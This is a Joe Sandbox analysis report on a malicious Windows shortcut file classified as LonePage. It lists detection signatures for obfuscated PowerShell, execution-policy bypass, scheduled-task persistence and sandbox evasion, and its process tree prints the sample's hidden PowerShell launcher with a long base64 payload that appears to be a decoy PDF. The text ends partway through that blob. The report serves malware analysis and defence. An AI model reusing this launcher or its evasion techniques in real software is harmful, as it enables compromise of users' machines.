Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
140AEcuVy7.lnk

Overview

General Information

Sample name:140AEcuVy7.lnk
renamed because original name is a hash value
Original sample name:0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51.lnk
Analysis ID:1522697
MD5:64752d058e5829210a0f407fb912c9d3
SHA1:4e8a0cfb784a6f93f8974b4f11679786cef86bb7
SHA256:0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51
Tags:lnkUAC-0099user-JAMESWT_MHT
Infos:

Detection

LonePage
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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Pf+jfUM3seLPsQl/3txvkF19+cWyZBNg3wt1pwEokeBMPP7O8UbrP/zFUWVAT5omnIcxQ5QIEXB1pQKKuCa0KTCIZmD5C6wGaYXM9iXhatuCOhQ0HCDNrdm3J2nfjINfRfb86rL8KlL8SuP5lcDzK5Y8vxL0+RWEvXh+oOf5FUvB4hA2kPQGqwGqBIoHgXVB1APZmpUgczR32C3qkQ/0w9AG1Oxut6iv1lXmV5dfrau+HZQNtH3Or644sDiQDTYTaD5E+eT5gUAbIWyIVgwlOIQhOtH8A3cA0BTcluIwEa8wmo/AvoCGCcQidbtF05ECdAkw6ItfgYIMKA10TQI4GmbYLZrOfiWw+ZUGUBooZFDrKmG3aDL7laAHv7qAHGDQAUmgEDCEIX4BsoHuMme/Ej6n2yf5uTzwEKi4/f9vMjAAAFphIaEKZW5kc3RyZWFtCmVuZG9iago1IDAgb2JqCjw8IC9UeXBlIC9YT2JqZWN0IC9TdWJ0eXBlIC9JbWFnZSAvV2lkdGggMjA2NCAvSGVpZ2h0IDM0MzIgL0JpdHNQZXJDb21wb25lbnQgMSAKL0ltYWdlTWFzayB0cnVlIC9GaWx0ZXIgL0NDSVRURmF4RGVjb2RlIC9EZWNvZGVQYXJtcyA8PCAvSyAtMSAvQ29sdW1ucyAyMDY0ID4+IAovTGVuZ3RoIDM2NjIgPj4gCnN0cmVhbQ0K5AT4IQE3B1d3ff//XICdQb/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////mlBb3///////////gg9x//////////////////////////8mzjIUZBmUBDwLmo6ZUEEwVcLRcNQmgSWECpOHTCBUkgtNvNjSSwgq306Cn1Melp8XpapKt9Ljpf9JEVRr/S3S/1q1qv1lzvy5+8E1QZDFSVB/wnnDDfnD/3TYN9N/wfb63/g3u67fr/fXv7////9L///v+v/r7r/6/v6ekturpfee1S/eftJtJNLbStpJpmhJNpRW2lYqwg4pimFTFWC8MEGEwWGFEOIiIjD19KEsKP/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////LVBWUM4y633ly7tvfoN/2///v//6/hL+X1///H/hv+3/b//X9pdW11tpJhKxQQq1UR/8tUEAgoMnCkfIoMjik2T5BWR8zZSR2kModEHHnw/D21sjoJrdkLzfk3Tou2yWB0ffjW+mnrdINtO079bdfaaFJvfEaf6aeOk/f/eI9b//dL7+a1moZ4igzMMHhk5HA5sZ8zBkuFNmTmbMpbJ81RGM4/3yZs4ZDP/aVnFhUHD1tNNc4Ina5wU6EYM4O0zYObEvPZ8KQf54U0DngQ8R4KbGeFujwzDMRcz4p68wOy/1vCSp8sd2CcjdJgnIQenWvXrWnrr6hTpr6aB4TtO2117W/hQs9+vBUl6eaM2NhaNjmufby4/LeGeFTVIt3SQRdu+XmXD+5N6ray4aLcm+Zy3o1tk4Et3NDdINfaLh/X3/8HWvxdW91bS8ffr2t9J9ab/quv2FpWRz60mm2sVbozft3/g9f77d/6bpetf/9ra/7/9/n+2371/+lX//j7e1jsej/t//7b/4bVLHVf9tRx///x7VfCKH+P/6rQ7//+Ok1HuO/+3fet/zV6//+aff/5d2CKefXH/v/+xpVTt/v/6X//4Ip+37+19Xf//wr9f/dhvNHa0bHT/9PQN///1/1zY6KC/0/+v/qu2O/++j//r////HVv9L/6/31vb/Sf/H/8e///7qOP/qP/rpP/XX4//pOkH/pv////4RT+vjY/+/j/ULv+l//+l+l/qD///eWR/X/7Xr/6v10v9L/+m//X/S/////Ff/ouP/vf/O/RRf/Xfa/6/12vW/7/7/Wv/lu6//+X38cONP6C3/ddf9LeuF+6X/cn7Pf///a+v+2c+6/sh3pa+r039fel/9XX6X21Y9LrvSXe71/2wv/+p7U/v5phduuj3rf70tHv80gTNyWree29tLIV9Wlqrd99xqt6rHr2q6GYChO0lTRBJ9JtK3p0l7VEOdJ3SqEMu9tJ1CbaTaVhkdNWkE+27rTbZIfaDTX2r17shirSsd2nsba8VFBbilMBNil0opiorumO0LUKv3696f/8ML/7rppq6qDaitppQUNJVtfULaaeqiOIiI0IiItDL+IiIwQiIizWgwQjBNMuAmCFrEaPGLsIRB2hERERH0NBxERERERGCbERH9O4P8REetb6fKxwAQAQAAplbmRzdHJlYW0KZW5kb2JqCjYgMCBvYmoKPDwgL1R5cGUgL1hPYmplY3QgL1N1YnR5cGUgL0ltYWdlIC9XaWR0aCA0MDggL0hlaWdodCA1NiAvQml0c1BlckNvbXBvbmVudCAxIAovSW1hZ2VNYXNrIHRydWUgL0ZpbHRlciAvQ0NJVFRGYXhEZWNvZGUgL0RlY29kZVBhcm1zIDw8IC9LIC0xIC9Db2x1bW5zIDQwOCA+PiAKL0xlbmd0aCAxOTIgPj4gCnN0cmVhbQ0K5XVXCZlwJOzhDJQGc7rCAnsJppwoQPCB7QaafT1qnr0+9pr1TtkLfapsIPVEMIasJ90D219JvHqrf7rXyEH08hHaVLp0sFq3v2RoGPpWl+m/VtL/71Sur//9fSf6uDrf933vXvt+mn4+kPp35FQtek2+2u+/vrrlP/tJNPptroNfDSVBrTZDP2QtbTSyFT20ldD7x1fStpJtr7Xtdtr2q7SW1W2FttacNJbBfDCpwa1gwR3bIkY6cyDhGIjwAQAQCmVuZHN0cmVhbQplbmRvYmoKNyAwIG9iago8PCAvVHlwZSAvWE9iamVjdCAvU3VidHlwZSAvSW1hZ2UgL1dpZHRoIDE5NjggL0hlaWdodCAyMjMyIC9CaXRzUGVyQ29tcG9uZW50IDEgCi9JbWFnZU1hc2sgdHJ1ZSAvRmlsdGVyIC9DQ0lUVEZheERlY29kZSAvRGVjb2RlUGFybXMgPDwgL0sgLTEgL0NvbHVtbnMgMTk2OCA+PiAKL0xlbmd0aCAyNDE3NCA+PiAKc3RyZWFtDQotcS5aYKjNFGQVGmSESeVeSI2DlDNI+zbNBZZqgIczoyGZODlDNbOA56TTyGFOSaaZ0dmZJrar4WsNNPCDT7W77XT1BP//X2mgegwQ/1/11Qd+v6JD+qYJ6chXr6f/6Sev/pP9E3cjHeiTtE46f/X+qJZtZPP/XlntdPN9JtJo+Rf/ua/66STdrTr/X7aegb9BB1Gh/9/7qoX/zDv//LHjpf09f6f3/19/7//6ta/+tP9eQt+Z3pbdr/cff/SV//5b7VFv/j7iviYf63/8JWC///V6+ver/yx/6/sf///3XY9uv/mHf7X/+//////v5s6r/7/xyfd/G3//6F6H+3J5ji//9a/9lD+//2Sf/9Pcsf1tf3+i39N2///DX//+3fv//7/L//3321pr6+i+7drj/L/+l9E/32F+1tUX8eafTtf297X/W/1/XYV0vY2zb+9dLuvSvtiv9L//rxsftMfT/fxX/w2v+g3RcPaegrtO00009InbdF25rYaapEnbSJwHbStNA2idsO0Hb/02z5SbZHGnmsi3W9pJtkdtmylu000rTTtNNNO1tsj6r07Pln5IjvVsi4km4Ij7W7Ujhr1WyO3/V/28Nr00+7Wt71Sttdcl1r/f9en7/rpJpJ2ter0Ye14f/6f+t+vWrj6/0/+v/r+/X7/v9f//X7f1T//f///+r+msf9b/+////0v/H///V/939rX/3+v/+vpY7//pf/39f//v/il//j6WN6Q69P++Ev//9pLtLf+Evjv9//9dWl2lCS////r8VX/Ff1/+K8QWP4r1jjv/j1jEFxBV/2//4i9cQXX//rX36LH/38jq7f1+ujD9W/9tf/T1tGHsfB///5HYd4S5LvyOw/5Lsjyx/yPujPkeQk+ETeG6/DH/6JDuJ3yO2Et+S5//r/Dfpf/Tf/1v/8V1hfS2///9KRjuvbCWyUf/7///pf/v//yN//1+l6W6/yT7/1p691xf3/+v/vpf//3/1//X6XpfWe///67r7S///9b/3r//m73//////X/T9Lv3/b////7191+Zr/3r1/M//X/+rv17za11/3P/2kt/6rr6/X1t11bT7X7W1/bVf6tb+1/vT1tVXVNe1v9LdfS11tcR2kqulYShpJ6ae9YStU2Glenqtqna3fdp8XDSQu9UrY1VuvvTtK7TtCoQbFIWw0ghTFcWqbaSHFJxSp2mEtC0GE00woTTsjiJ7FJsVaptJw2KSTbTTCFMMjiWmkj/0vev7r/r/69f//9ff/0uv//r/6+n0v/39fb7/f9uv69f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